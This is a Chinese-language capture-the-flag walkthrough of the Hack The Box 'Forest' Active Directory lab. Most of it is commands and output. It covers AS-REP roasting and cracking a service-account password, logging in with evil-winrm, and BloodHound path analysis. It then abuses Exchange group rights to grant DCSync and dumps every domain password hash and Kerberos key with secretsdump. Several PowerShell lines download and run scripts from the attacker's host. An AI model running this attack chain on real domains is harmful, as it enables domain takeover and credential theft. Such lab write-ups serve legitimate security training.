Objects,DC=htb,DC=localCN=HealthMailbox7108a4e350f84b32a7a90d8e718f78cf,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=HealthMailbox0659cc188f4c4f9f978f6c2142c4181e,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=Exchange Install Domain Servers,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=SystemMailbox{ce2583c9-4e38-48ab-b23d-88d6e3aa059f},CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=Program Data,DC=htb,DC=localCN=Microsoft,CN=Program Data,DC=htb,DC=localCN=NTDS Quotas,DC=htb,DC=localCN=Managed Service Accounts,DC=htb,DC=localCN=Keys,DC=htb,DC=localOU=Service Accounts,DC=htb,DC=localCN=svc-alfresco,OU=Service Accounts,DC=htb,DC=localOU=Security Groups,DC=htb,DC=localCN=Service Accounts,OU=Security Groups,DC=htb,DC=localCN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=localCN=test,OU=Security Groups,DC=htb,DC=localOU=Employees,DC=htb,DC=localOU=Information Technology,OU=Employees,DC=htb,DC=localOU=Exchange Administrators,OU=Information Technology,OU=Employees,DC=htb,DC=localCN=Sebastien Caron,OU=Exchange Administrators,OU=Information Technology,OU=Employees,DC=htb,DC=localOU=Developers,OU=Information Technology,OU=Employees,DC=htb,DC=localCN=Santi Rodriguez,OU=Developers,OU=Information Technology,OU=Employees,DC=htb,DC=localOU=Application Support,OU=Information Technology,OU=Employees,DC=htb,DC=localOU=IT Management,OU=Information Technology,OU=Employees,DC=htb,DC=localCN=Lucinda Berger,OU=IT Management,OU=Information Technology,OU=Employees,DC=htb,DC=localOU=Helpdesk,OU=Information Technology,OU=Employees,DC=htb,DC=localCN=Andy Hislip,OU=Helpdesk,OU=Information Technology,OU=Employees,DC=htb,DC=localOU=Sysadmins,OU=Information Technology,OU=Employees,DC=htb,DC=localCN=Mark Brandt,OU=Sysadmins,OU=Information Technology,OU=Employees,DC=htb,DC=localOU=Sales,OU=Employees,DC=htb,DC=localOU=Marketing,OU=Employees,DC=htb,DC=localOU=Reception,OU=Employees,DC=htb,DC=localCN=TPM Devices,DC=htb,DC=localCN=Builtin,DC=htb,DC=localCN=Account Operators,CN=Builtin,DC=htb,DC=localCN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=htb,DC=localCN=Incoming Forest Trust Builders,CN=Builtin,DC=htb,DC=localCN=Windows Authorization Access Group,CN=Builtin,DC=htb,DC=localCN=Terminal Server License Servers,CN=Builtin,DC=htb,DC=localCN=Administrators,CN=Builtin,DC=htb,DC=localCN=Users,CN=Builtin,DC=htb,DC=localCN=Guests,CN=Builtin,DC=htb,DC=localCN=Print Operators,CN=Builtin,DC=htb,DC=localCN=Backup Operators,CN=Builtin,DC=htb,DC=localCN=Replicator,CN=Builtin,DC=htb,DC=localCN=Remote Desktop Users,CN=Builtin,DC=htb,DC=localCN=Network Configuration Operators,CN=Builtin,DC=htb,DC=localCN=Performance Monitor Users,CN=Builtin,DC=htb,DC=localCN=Performance Log Users,CN=Builtin,DC=htb,DC=localCN=Distributed COM Users,CN=Builtin,DC=htb,DC=localCN=IIS_IUSRS,CN=Builtin,DC=htb,DC=localCN=Cryptographic Operators,CN=Builtin,DC=htb,DC=localCN=Event Log Readers,CN=Builtin,DC=htb,DC=localCN=Certificate Service DCOM Access,CN=Builtin,DC=htb,DC=localCN=RDS Remote Access Servers,CN=Builtin,DC=htb,DC=localCN=RDS Endpoint Servers,CN=Builtin,DC=htb,DC=localCN=RDS Management Servers,CN=Builtin,DC=htb,DC=localCN=Hyper-V Administrators,CN=Builtin,DC=htb,DC=localCN=Access Control Assistance Operators,CN=Builtin,DC=htb,DC=localCN=Remote Management Users,CN=Builtin,DC=htb,DC=localCN=System Managed Accounts Group,CN=Builtin,DC=htb,DC=localCN=Storage Replica Administrators,CN=Builtin,DC=htb,DC=localCN=Server Operators,CN=Builtin,DC=htb,DC=localOU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Organization Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Recipient Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=View-Only Organization Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Public Folder Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=UM Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Help Desk,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Records Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Discovery Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Server Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Delegated Setup,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Hygiene Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Compliance Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Security Reader,OU=Microsoft Exchange Security Groups,DC=htb,DC=localService AccountsCN=Security Administrator,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Exchange Servers,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Managed Availability Servers,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=localCN=ExchangeLegacyInterop,OU=Microsoft Exchange Security Groups,DC=htb,DC=local[*] Bye!重点:CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=localhtb.local域的服务账号叫svc-alfresco是可以利用AS-REP Roasting攻击
AS-REP Roasting攻击
AS-REP Roasting和kerberoasting攻击的区别
AS-REP Roasting:AS-REP Roasting 可提取账户哈希来进行离线暴力破解,前提是需要账户开启不使用Kerberos预认证或将uf_dont_require_preauth设置为true。
kerberoasting:kerberoasting 通常需要域上的凭据才能进行身份验证,在域中提取服务帐户凭据哈希来进行离线破解。
使用Impacket包中的GetNPUsers.py进行TGT Hash获取
下载:https://github.com/fortra/impacket
安装:pip install -r requirements.txt
工具位置:impacket-0.10.0/examples/
用法:python GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
返回TGT Hash内容Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation[*] Getting TGT for svc-alfresco$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e02274cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d55479606438471030499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c44b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56524d4f415ae283ef0feb
使用hashcat破解TGT
用法:hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
参数说明:
hash.txt是TGT Hash,rockyou是字典如果爆破不不出来可以添加一下密码,--force忽略异常,-m 18200 指定破解模式为Kerberos 5, etype 23, AS-REP
TGT Hash:$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e02274cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d55479606438471030499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c44b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56524d4f415ae283ef0feb
结果:└─# hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --forcehashcat (v6.2.5) startingYou have enabled --force to bypass dangerous warnings and errors!This can hide serious problems and should only be done when debugging.Do not report hashcat issues encountered when using --force.OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]=====================================================================================================================================* Device #1: pthread-12th Gen Intel(R) Core(TM) i5-12400F, 1428/2921 MB (512 MB allocatable), 4MCUMinimum password length supported by kernel: 0Maximum password length supported by kernel: 256Hashes: 1 digests; 1 unique digests, 1 unique saltsBitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotatesRules: 1Optimizers applied:* Zero-Byte* Not-Iterated* Single-Hash* Single-SaltATTENTION! Pure (unoptimized) backend kernels selected.Pure kernels can crack longer passwords, but drastically reduce performance.If you want to switch to optimized kernels, append -O to your commandline.See the above message to find out about the exact limits.Watchdog: Temperature abort trigger set to 90cInitializing backend runtime for device #1. Please be patient...Host memory required for this attack: 0 MBDictionary cache built:* Filename..: /usr/share/wordlists/rockyou.txt* Passwords.: 14342314* Bytes.....: 139917341* Keyspace..: 14342306* Runtime...: 1 sec$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e02274cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d55479606438471030499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c44b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56524d4f415ae283ef0feb:s3rviceSession..........: hashcatStatus...........: CrackedHash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e...ef0febTime.Started.....: Sat Dec 24 07:24:55 2022, (0 secs)Time.Estimated...: Sat Dec 24 07:24:55 2022, (0 secs)Kernel.Feature...: Pure KernelGuess.Base.......: File (/usr/share/wordlists/rockyou.txt)Guess.Queue......: 1/1 (100.00%)Speed.#1.........: 24330 H/s (0.52ms) @ Accel:256 Loops:1 Thr:1 Vec:8Recovered........: 1/1 (100.00%) DigestsProgress.........: 1024/14342306 (0.01%)Rejected.........: 0/1024 (0.00%)Restore.Point....: 0/14342306 (0.00%)Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1Candidate.Engine.: Device GeneratorCandidates.#1....: 123456 -> abcd1234Hardware.Mon.#1..: Util: 45%Started: Sat Dec 24 07:24:26 2022Stopped: Sat Dec 24 07:24:57 2022获取明文:s3rvice
使用john破解:john hash.txt --fork=4 -w=/usr/share/wordlists/rockyou.txt --fork=4 指定破解模式为Kerberos hash.txt TGT Hashrockyou 字典 john hash.txt --fork=4 -w=/usr/share/wordlists/rockyou.txtUsing default input encoding: UTF-8Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])Node numbers 1-4 of 4 (fork)Press 'q' or Ctrl-C to abort, almost any other key for statuss3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)1 1g 0:00:00:00 DONE (2022-12-24 07:33) 100.0g/s 1600p/s 1600c/s 1600C/s 123456..helloWaiting for 3 children to terminates3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)3 1g 0:00:00:02 DONE (2022-12-24 07:33) 0.3597g/s 367263p/s 367263c/s 367263C/s s3tang1tar..s3rena2 0g 0:00:00:10 DONE (2022-12-24 07:33) 0g/s 356757p/s 356757c/s 356757C/s xCvBnM,..*7¡Vamos!4 0g 0:00:00:10 DONE (2022-12-24 07:33) 0g/s 356756p/s 356756c/s 356756C/s c125263.abygurl69Use the "--show" option to display all of the cracked passwords reliablySession completed.查看之前破解结果:john --show hash.txt(之前指定的破解文件)john在破解成功后再次破解会显示破解成过,需要查看之前破解出来的密码用上面的命令$krb5asrep$23$svc-alfresco@HTB.LOCAL:s3rvice
使用WinRM登陆
安装:gem install evil-winrm下载地址:https://github.com/Hackplayers/evil-winrm/releases/tag/v3.3
命令:evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice -i 机器ip-u 服务账号-p 通过john或者hashcat爆破TGT hash成功后的明文密码
获取user flag:
type c:\Users\svc-alfresco\desktop\user.txt
使用bloodhound寻找特权路径
使用WinRM登录并加载bloodhound powershell收集器
1.使用python开启80端口以下载SharpHound.ps1SharpHound.ps1目录下运行python3 -m http.server 80
2.WinRM加载Powershell脚本iex(new-object net.webclient).downloadstring("http://10.10.14.26/SharpHound.ps1") 10.10.14.26根据你的ip addr填写
3.执行脚本invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
4.下载凭据文件WinRM下运行download remote_path local_path
安装bloodhound:pip install pycrypto //环境库pip install bloodhound //采集器apt install bloodhound //本体sudo apt install default-jre //安装最新java非必须
这可以使用该命令获取凭据:bloodhound-python -d htb.local -usvc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161
启动bloodhound:neo4j startneo4j/neo4j 默认账号密码kali工具包中启动bloodhound
分析:起始位置:SVC-ALFRESCO@HTB.LOCAL目标位置:DOMAIN ADMINS@HTB.LOCAL内容:1. SVC-ALFRESCO@HTB.LOCAL MembefOf SERVICE ACCOUNTS@HTB.LOCAL2. SERVICE ACCOUNTS@HTB.LOCAL MembefOf PRIVILEGED IT ACCOUNTS@HTB.LOCAL3. PRIVILEGED IT ACCOUNTS@HTB.LOCAL MembefOf ACCOUNT OPERATORS@HTB.LOCAL4. ACCOUNT OPERATORS@HTB.LOCAL GenericAll EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL5. EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL WriteDacl DOMAIN ADMINS@HTB.LOCAL目前控制的服务账号是SVC-ALFRESCO@HTB.LOCAL位于SERVICE ACCOUNTS@HTB.LOCAL组中,SERVICE ACCOUNTS@HTB.LOCAL组位于PRIVILEGED IT ACCOUNTS@HTB.LOCAL组中,ACCOUNT OPERATORS@HTB.LOCAL对EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL组有完全控制权并且PRIVILEGED IT ACCOUNTS@HTB.LOCAL属于ACCOUNT OPERATORS@HTB.LOCAL组中,因此可以通过ACCOUNT OPERATORS@HTB.LOCAL权限滥用写入账号到EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL中并通过该组写入Dacl于DOMAIN ADMINS@HTB.LOCAL完成权限提升。分析总结:1.SVC-ALFRESCO@HTB.LOCAL属于ACCOUNT OPERATORS@HTB.LOCAL组2.ACCOUNT OPERATORS@HTB.LOCAL组对EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL组有完全控制权3.通过EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL组向DOMAIN ADMINS@HTB.LOCAL组写入Dacl完成权限提升
添加命令:net group "EXCHANGE TRUSTED SUBSYSTEM" svc-alfresco /add /domain //添加net group "EXCHANGE TRUSTED SUBSYSTEM" //查询添加可以新增一个账号添加到EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL中net user hack hack@123 /add /domainnet group "EXCHANGE TRUSTED SUBSYSTEM" hack /add /domain
滥用WriteDacl进行权限提升
下载:滥用WriteDacl需要使用PowerSploit工具https://github.com/PowerShellMafia/PowerSploit需要使用的Powershell脚本叫PowerView.ps1位于Recon目录下
过程:PowerSploit-3.0.0/Recon目录下运行python3 -m http.server 80evil-winrm shell:方式1:iex(New-Object Net.webclient).downloadstring('http://10.10.16.9/PowerView.ps1')$pass = convertto-securestring 'hack@123' -AsPlainText -Force$cred = New-Object System.Management.Automation.PSCredential ('HTB\hack', $pass)Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hack -Rights DCSync方式2:iex(New-Object Net.webclient).downloadstring('http://10.10.16.9/PowerView.ps1')net user john abc123! /add /domainnet group "Exchange Windows Permissions" john /addnet localgroup "Remote Management Users" john /add //加入远程组可以使用WinRM进行登录$pass = convertto-securestring 'abc123!' -asplain -force$cred = new-object system.management.automation.pscredential('htb\john',$pass)Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync如果遇到Add-DomainObjectAcl无法识别情况不要使用github下载的Latest使用Code下载的master
Dcsync:使用impacket工具包下的secretsdump.py进行Dcsync操作建议使用impacket_0_9_22版本impacket-0.10.0可以存在不兼容导致运行失败impacket-impacket_0_9_22\examples\secretsdump.pypython3 secretsdump.py hack:hack@123@10.10.10.161结果:Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretshtb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::hack:9601:aad3b435b51404eeaad3b435b51404ee:3593d341679cb1cd42d5ee96d317987d:::FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:541d62e36754f1ad9932c73c83a2ea22:::EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::[*] Kerberos keys grabbedhtb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375htb.local\Administrator:des-cbc-md5:c1e049c71f57343bkrbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528bkrbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58krbtgt:des-cbc-md5:9dd5647a31518ca8htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864ehtb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43ehtb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bfhtb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bddhtb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236ehtb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225ehtb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43edhtb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53fhtb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01ahtb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23chtb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5dhtb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88ahtb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074dhtb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bdhtb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefbhtb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40chtb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943ahtb.local\sebastien:des-cbc-md5:702a3445e0d65b58htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fadhtb.local\lucinda:des-cbc-md5:a13bb56bd043a2cehtb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2eahtb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294ahtb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94fhtb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6htb.local\andy:des-cbc-md5:a2ab5eef017fb9dahtb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25htb.local\santi:des-cbc-md5:4075ad528ab9e5fdhack:aes256-cts-hmac-sha1-96:3e877d2ee838c042e5124b1304e158a77cf7ac14422977e5d769b5fb336a59c5hack:aes128-cts-hmac-sha1-96:d81571d16a8bcc04086496dcb8c1ca76hack:des-cbc-md5:706b0bec3b2986daFOREST$:aes256-cts-hmac-sha1-96:03c48356fe7273823823843a0404b6a40f2970a44daf762a7632d9b101dbfabaFOREST$:aes128-cts-hmac-sha1-96:0612d5cf3ef699f12e8bf4d2db18c9f2FOREST$:des-cbc-md5:a4ceadfed0d526a7EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4eEXCH01$:des-cbc-md5:8c45f44c16975129[*] Cleaning up...
获取System flag
Dcsync:htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
type C:\Users\administrator\Desktop\root.txt
总结
通过nmap进行信息收集发现目标机器为域控使用windapsearch发现ladp可以匿名绑定并枚举用户发现htb.local域的服务账号叫svc-alfresco是可以利用AS-REP Roasting攻击,
使用Impacket包中的GetNPUsers.py进行TGT Hash获取使用使用hashcat或john破解TGT得到明文密码使用WinRM登陆域控机器,使用SharpHound.ps1收集域信息bloodhound分析特权路径,
分析发现EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL WriteDacl DOMAIN ADMINS@HTB.LOCAL并且svc-alfresco包含于EXCHANGE组,添加hack账号到EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL
滥用WriteDacl进行权限提升,使用impacket工具包下的secretsdump.py进行Dcsync操作获得域管权限.
工具使用:
nmap
windapsearch
Impacket
hashcat
john
evil-winrm
bloodhound
HTB打靶(Active Directory 101 Forest)相关推荐
- HTB打靶(Active Directory 101 Mantis)
namp扫描 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 03:40 EST Stats: 0:01:28 elapsed; 0 hos ...
- HTB打靶(Active Directory 101 Sizzle)
